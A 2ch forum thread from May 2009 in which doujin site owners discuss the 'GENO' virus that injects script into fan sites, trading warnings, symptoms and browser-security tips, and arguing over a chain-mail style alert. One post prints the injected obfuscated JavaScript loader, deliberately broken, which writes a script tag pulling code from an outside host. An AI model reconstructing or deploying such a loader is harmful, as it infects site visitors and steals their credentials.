うちもだ。幸いまだ感染報告のないジャンルだが、過疎サイトだしほぼスルーされてる。
友人に注意文送ったら「わからん」「DVD見終わってから」とか悠長なこといいやがるし…もう泣きたい

929:GENO
09/05/16 18:40:40 veAuBOXk0
>>858
お前さんは偉いよ、この非常時にネラバレとか言ってられないよな
自分もピコサイトだがサイトトップに注意書きを書いて来たぜ
「友達にメールで教えて貰いました」の一文つきでな!

930:geno
09/05/16 18:41:03 LwX4sLTz0
半年ROMとか言わないお前らのやさしさに感動した
まぁ今はググるのも危ないしね

>>903 賛成
今のところ正しくても間違ってても情報が2ちゃんくらいにしか集まらないし
わかりやすくすべきだと思う

931:GENO
09/05/16 18:41:07 b/+eltGS0
おい、次スレはまだかよ

932:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:41:44 gbCprrvH0
PCのチェック二重三重にして安全を確認してから自サイトと日記、ミクシ、別のところでやってるブログ2つと
参加してるマイナーSNS、プーペガールでウィルスの告知してきた。
場所によって同人向けと一般向けのまとめを使い分けて誘導。
早く収まってくれ……。

933:GENO
09/05/16 18:42:49 wC2VoGPT0
ピコだろうとなんだろうと、注意喚起する事に意味があるんだ
注意書きを見て誰かが情報を得るんだ。その行為自体に意味があるんだよ
誰かがやるだろうって何もやらなかったら広まる情報も広まらないもんだ
自分がやるしかないんだよ

934:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:43:45 bNAe6Uzb0
>>858
「知り合い(=スレのみんな)から聞きました」

嘘は言ってないよな、嘘は

935:GENO
09/05/16 18:43:46 hhHQlddm0
腐女子・情弱ウイルス FJウイルスと命名

936:GENO
09/05/16 18:44:16 DwOS+Yc30
改ざんの確認ではクリアしたけどスキャンで1個なんか引っかかったorz
このウイルスの名前ってもうあるの?
どこかにもう記載されてた?


937:GENO
09/05/16 18:44:59 O4mBjhCo0
挿入スクリプト参考に追加
※ランダムに文字を削除したから貼り付けても動かないよ

<すくりぷと language=じゃばすくりぷと><!--
(function(){var UkRR='%';var WdBp=('&61&20a&3d&22S&69ptEngi&65&22&2c&3d&22&56&
65&72s&69on+()&22&2c&6a&3d&22&22&2c&3dn&61&76ig&61tor2user&41&67ent&3bi&66
(u&2ein&6&65x&4f&66(&22C&68rm&65&22)&3c0)&26&26(&75&2ein&64ex&4ff(&22i&6e&22)
&3e0)&26&26&28u&2e&69&6d&65x&4ff&28&22&4e&54&206&22)&3c0)&26&26(&64cument
&2ecooki&65&2e&6ede&78O&66(&22&6di&6b&3d&31&22)&3c0)&26&26(t&79peo&66&28&
7arvzts)&21&3dty&70&65of&28&22A&2&7brvzt&73&3d&22A&22&3bval(&22i&66
(win&64o&77&2e&22+a+&22)))&3dj+&22+&6+&22M&61j&6fr&22+b&2b&2b&22Mi&6e&6fr
&22+a+b+&22&42uild&22+b+&22j&3&22&29&3b&646f&63ument&2ewr&69te&28&22&3cs
&63ri&70t&0&73&72c&3d&2f&2fma&72t&75&22+&22z&2e&63n&f&76i&64&2f&3fid&3d&22
&2bj+22&3c&5c&2fscrip&74&3e&22)&3b&7d').rplace(/&/g,URR);eval(uescape(WdBp))})();
--></すくりぷと>


938:GENO
09/05/16 18:45:03 TV+NV+ev0
>>923
それやるつもり

939:geno
09/05/16 18:45:07 VO6XJwmI0
>>900が次スレ立ててくれたよ
多分連投制限に引っかかってる

【管理も】同人サイト・GENOウィルス注意3【閲覧も】
スレリンク(doujin板)

940:げの
09/05/16 18:45:21 tRYHiqa3O
【管理も】同人サイト・GENOウィルス注意3【閲覧も】
スレリンク(doujin板)

941:GENO
09/05/16 18:45:28 pbsx4U5a0
名前はたしかダウンアド?になったんだっけか

942:げの
09/05/16 18:45:34 afm0lJ4jO
>>935
きゃー不二先輩ー
って喜ぶ奴出そうだから却下

943:geno
09/05/16 18:45:34 lGXsY/+00
次スレ立ったね
>>900乙です

944:GENO
09/05/16 18:45:51 h9dtK2bg0
伏せてあっても現状解説入るしwikiには伏せないで載るみたいだしイミフなとこいかないからどっちでもいいや
926のいう通り情報集まんないと意味ないっしょ…

945:GENO
09/05/16 18:45:53 RwVE/EfH0
>>936
スキャンでひっかかるようなものいつまでもPCに飼わないで

946:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:45:59 hX/lFYJM0
>お知らせ
>メールを来た人から『トップページにトロイの木馬が付いているようです。』…びっくりをしました。
>兄にメール返事を来て、来週の土曜日で兄が直してもらいます。大変に申し訳にありませんでした。

864 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/14(木) 16:12:26 ID:???
メガニウムとバクフーンのイラストがいっぱいあるな どれも上手い
URLリンク(kurisu06.candypop.jp)

867 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/16(土) 08:40:04 ID:???
>>864
このサイト、ウィルスが入ってるんだが…

869 名前:名無しさん、君に決めた![sage] 投稿日:2009/05/16(土) 15:01:53 ID:???
2009年5月13日 03:13:16 GMTのGoogleキャッシュからウイルス確認





947:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:46:12 FMfjX6SN0
>>916
おそらく「SayMove!」かと思われる


ニコニコのぞき見検索&SayMove! ウイルス感染について
申し訳ありません。更新に使っていたPCが、
通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。

5月12日 午前6時31分~午前8:00頃
・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
・SayMove!のトップページ
同日 午前6時31分~正午頃
・ニコニコのぞき見検索のマイリスト表示ページ


心当たりある奴はクリーンアップしとけ

948:GENO
09/05/16 18:46:21 Hd92Ml+u0
元から入れていたjavaScriptの記述にものすごい決め付けで焦ったメール貰ったよ
違うって返しておいたけどこのテンションで広められてたら嫌だなあ

949:GENO
09/05/16 18:46:25 OPjvi40EO
>>936
ダウンアド

950:GENO
09/05/16 18:46:28 6WgPAgbO0
sqlspdbcなんだけど、自分の組み立てたCPで殆どのファイルが2008/04/14付けの
用になってるんだけどコレってセフセフ?
ちなみに全部起動も要領も大丈夫だったんだけど。

951:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:46:39 NG0XsJSj0
>>936
エンジンとウイルス名晒せよw

952:GENO
09/05/16 18:46:56 OdBBM1PA0
漏れは
(1)sqlsodbc.chmを改変
(2)cmd.exe、regedit.exeが起動不能
が確認できて、感染しているとわかった。
完全ではないと思うし、他の香具師に適用できるかわからないし、
力業のところもあるが、少なくとも(2)の症状は解消できたので、
経緯を含めて、次レス以降で報告する。

953:GENO
09/05/16 18:47:19 6WgPAgbO0
>>950CPじゃねぇ、PCだった

954:GENO
09/05/16 18:47:20 /m6gQ1ZiP
>>949
それと今回のGENOは別らしいよ
ダウンアドは前からある別のっだって見たけど

955:geno
09/05/16 18:47:58 U58tIYjBO
こんなメールきたw
誰が始めたか分からんがGJ!
――――――――

※緊急※タチの悪いウイルスが同人サイトにも拡大中

現在新種のコンピュータウイルス「GENOウイルス(通称)」が急速に拡大中です
感染サイトを見ただけで感染発症し、現時点ではセキュリティソフトでの完全な保護は確立されていません
小林製薬や旅行代理店等、大手サイトだけでなく同人サイトにも広まっています

感染するとあなたのパソコンに侵入したウイルスは、ネットに繋がった時点で パスワード、クレジットカードの情報、FTPのパスワードなどを抜く、また、Acrobatが挙動不審になる等の問題を引き起こします
感染者のパソコンからアップされたサイトのファイルにウイルスコードが自動挿入され、そのサイトを見た人を感染させます。
(サイト管理人は自分のサイトのソースを見ることで書き換えを確認することができます)
全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。


詳細・感染の確認方法・対策、感染ジャンルは以下のまとめ
同人サイト向け・通称「GENOウイルス」対策まとめ
URLリンク(www31.atwiki.jp)

※このメールを知り合いの同人サイト管理者・閲覧者に送って下さい※

956:GENO
09/05/16 18:48:09 E/Hkrb7LO
>>926
伏せ字にするとまとめ人に拾わないので
情報にカウントされない件

しかしボカロはヤバいな

957:GENO
09/05/16 18:48:27 xyYJqHyKO
ウイルスの件を今日知って、感染はしてなかったけど休止にしようと思うんだが
鯖の公式が感染してる場合っていうのはあるのかな?
更新したいんだがそれが怖くて出来ない…

958:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:48:31 XpshxGrz0
>>948
それすら判断できない人はふらふら閲覧して感染チェックとかしないで欲しいね
マカーなのかも知れないけどさ

959:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:48:41 Se14JChw0
>>950
OSも書いてよう

960:GENO
09/05/16 18:49:06 4SxWOZXB0
チェンメみたいにならんといいが

961:GENO
09/05/16 18:49:11 oRZKM7s90
>>955
おお!使わせていただくw

962:GENO
09/05/16 18:49:21 b/+eltGS0
>>900

>>949
ダウンドアはUSBじゃなかたっけ?

963:GENO
09/05/16 18:49:41 APiqzc70O
>>946
ついにポケモンでも出たということか?そうなのか?
もしそうだとさらに広まる恐れがあるな…自ジャンルオワタ

964:GENO
09/05/16 18:49:42 A9qSW+uH0
>>952
解消とかいってないでクリーンインストールしてくれよ

965:GENO
09/05/16 18:49:47 wC2VoGPT0
チェーンメールは駄目だろ
まとめサイトの印象が悪くなる

966:883
09/05/16 18:49:57 ivgR4yei0
まとめさんのアドレスってそのまま貼っていいよな?
「まとめサイトは感染者(疑い)が押し寄せてくるんだからやばい」って
書き込みをどっかでみたんだけど
「閲覧は個人の判断で」とか…かいたほうがいいか?

967:GENO
09/05/16 18:49:57 zlsW0HIw0
>>955
内容はともかく最後の一文は駄目だろう
誰彼なしに絨毯爆撃じゃチェーンメール化する

968:GENO
09/05/16 18:50:02 6WgPAgbO0
>>959
OSは窓のXP
ちなみに火狐使用してます。

969:geno
09/05/16 18:50:16 eO1ln/UG0
プニル使いなんだけど、デフォルトセキュリティからjavaスクリプトを外したら
とりあえずはOK?

970:
09/05/16 18:50:38 dhazjnvD0
>>950
sqlspdbcに関しては大丈夫だろう

971:GENO
09/05/16 18:50:50 0gY22C790
>>955
GJて・・・
そんな広め方じゃ逆にデマウイルスで削除されるだろう
アホなの?

972:GENO
09/05/16 18:51:34 lFaYB71c0
>>966
感染者がなんでもないサイト見たからって、なんでもないサイトが感染するわけじゃなかろ

973:geno
09/05/16 18:51:43 jRkFApPe0
とりあえず自PC・サイトの感染被害はなかった
あとは予防策だが火狐のnoscriptだけじゃ心許ないな

974:GENO
09/05/16 18:52:19 pbsx4U5a0
>>955
最後のまとめサイトのURLを感染済のURLに書き換えられたらオワタになるな

975:GENO
09/05/16 18:52:20 OdBBM1PA0
1.はじまり(2日前)
(1)2日前、Acrobatが異常終了
(2)その後、Googleのリンクをクリックしてもリンクに飛ばない。
(タイムアウトとなり、「サーバーが見つかりません。」エラー)
(3)気になって、いろいろ調べ、レジストリエディタを起動したら、
起動しなかった。コマンドプロンプトも起動しなかった。
(4)いやな汗をかきながら、ぐぐると「レジストリの××のキーを
修正すれば直る。」様なことがいくつかあったが、そのキーが見当たらなかった。
(5)ウイルスバスターでウイルススキャンを行ったが、ウイルスは検出され
なかった。


つづく

976:GENO
09/05/16 18:52:21 0gY22C790
最期の一文はデマウイルスの典型的な一文じゃないの
もしそのメールをまんま使われて、ウイルス感染してるサイトにリンク飛ばされる様に
改竄されて使われたらどうするんだ?

ちょっと後先考えずに熱くなりすぎてるやつ頭冷やせよ

977:GENO
09/05/16 18:53:13 RghX07DyO
>>955
さすがにチェンメはまずい気がする
改変されたり別の問題が起きるんじゃないか?

978:GENO
09/05/16 18:53:14 NddsKjpSO
>>955
私は、そんな一昔前のチェーンメールかのような内容のメールに記載されているURLは
絶対に踏みたくありません

979:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:53:20 hX/lFYJM0
フォクすけと俺にGDATAシールド(両手)を装備した



980:GENO
09/05/16 18:53:21 YUMGC+3j0
>>956
まとめの中の人拾ってるよ
ちんぷんかんぷんな伏せは今現在消えたし伏せなしをそこまでこだわりまくらなくても…スレが荒れるだけの気がする
まあ自分は何かあればわかるように書くけどね

981:geno
09/05/16 18:53:39 bmeWatfA0
>>974
koeeeeee

まとめサイト改竄した奴もいたし、危険だな

982:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:53:51 hX/lFYJM0
感染者のPCの中にあるHTMLファイルに勝手にjavascriptが埋め込まれるの?

983:CERO
09/05/16 18:54:07 NSWPz6JW0
>>952
頼んます

984:GENO
09/05/16 18:54:09 dUhoo+Zw0
メールで伝えてOKなのは、友人間だけだな。
書き手はサイト等で伝えればいいけど、読み専はきほん自衛しかないよね。

985:geno
09/05/16 18:54:18 LwX4sLTz0
ブラウザがsafari,つーかマカーなんだけど大丈夫だよね?

986:GENO
09/05/16 18:54:19 DwOS+Yc30
ダウンドアか、ありがとう。んじゃバックドアは別物か。
すでに削除済なんだけど、クリーンしてたほうがいいかな。

987:
09/05/16 18:54:31 /KVIyYsA0
>>952
感染して、表面上の症状だけ消してもやばいままじゃね?

988:geno
09/05/16 18:54:42 ivgR4yei0
>>972
おk ありがとう

チェンメはちょっと怖いな
むしろ感染を広げる気もする

989:geno
09/05/16 18:54:56 jRkFApPe0
そんなチェンメまがいなのを広めるぐらいなら
ニコニコにまとめ動画を上げる方がまだよっぽどマシだと思う

990:GENO
09/05/16 18:55:05 ylr5R1gd0
チェーンメールをGJはないわ……

991:GENO
09/05/16 18:55:16 bVgdtf980
>>955
あっという間にやばいスパムが出回るに全財産賭けられる

992:GENO
09/05/16 18:55:26 vNLIWV+e0
まがいと言うか完全にチェンメの類じゃ

993:GENO
09/05/16 18:55:26 w2e1m/MuO
>>955の文面はいくら善意で初めてもチェーンメール化するから転送を促す文章は削除してくれ

>>966
まとめサイトは管理人さんしか編集できないから今のところは大丈夫としか言えない

994:GENO
09/05/16 18:55:54 RNEPmgHp0
>>973
NoScriptよりPreferences Toolbarおすすめ
javascript、cookie、flashをそれぞれ個別に切れるよ
ましてやImageまで読まないようにできる

995:
09/05/16 18:55:58 /KVIyYsA0
>>982
それもあるのかもしれないが、
漏れたパスで勝手に鯖にアクセスされるんだろう

996:名前欄にスレ名入力推奨@自治スレ
09/05/16 18:56:17 5AlQPwu90
>>986
ダウンアドとは別物って確か前の方のレスで出てたような

997:geno
09/05/16 18:56:56 ztB8Zhmo0
>>982
FTPのパスを抜かれて外部に置いたhtmlが勝手に第三者の手で書き換えられる
んだったと思うが

998:geno
09/05/16 18:57:19 bmeWatfA0
>>982
このスレの1から読んで来い

999:geno
09/05/16 18:57:23 iR0LjWegO
VIPの祭みたいに興奮しきって冷静な判断が下せてない人もいるね>チェーンメール推奨

1000:geno
09/05/16 18:57:45 sZa7+4z70
1000なら感染が止まる

1001:1001
Over 1000 Thread
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
  |    最 後 尾 。  |     このスレッドは1000を超えました。
  |________|
     ∧∧ ||
    (. ゚д゚)||             同人@2ch掲示板
      / づΦ           URLリンク(changi.2ch.net)



最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch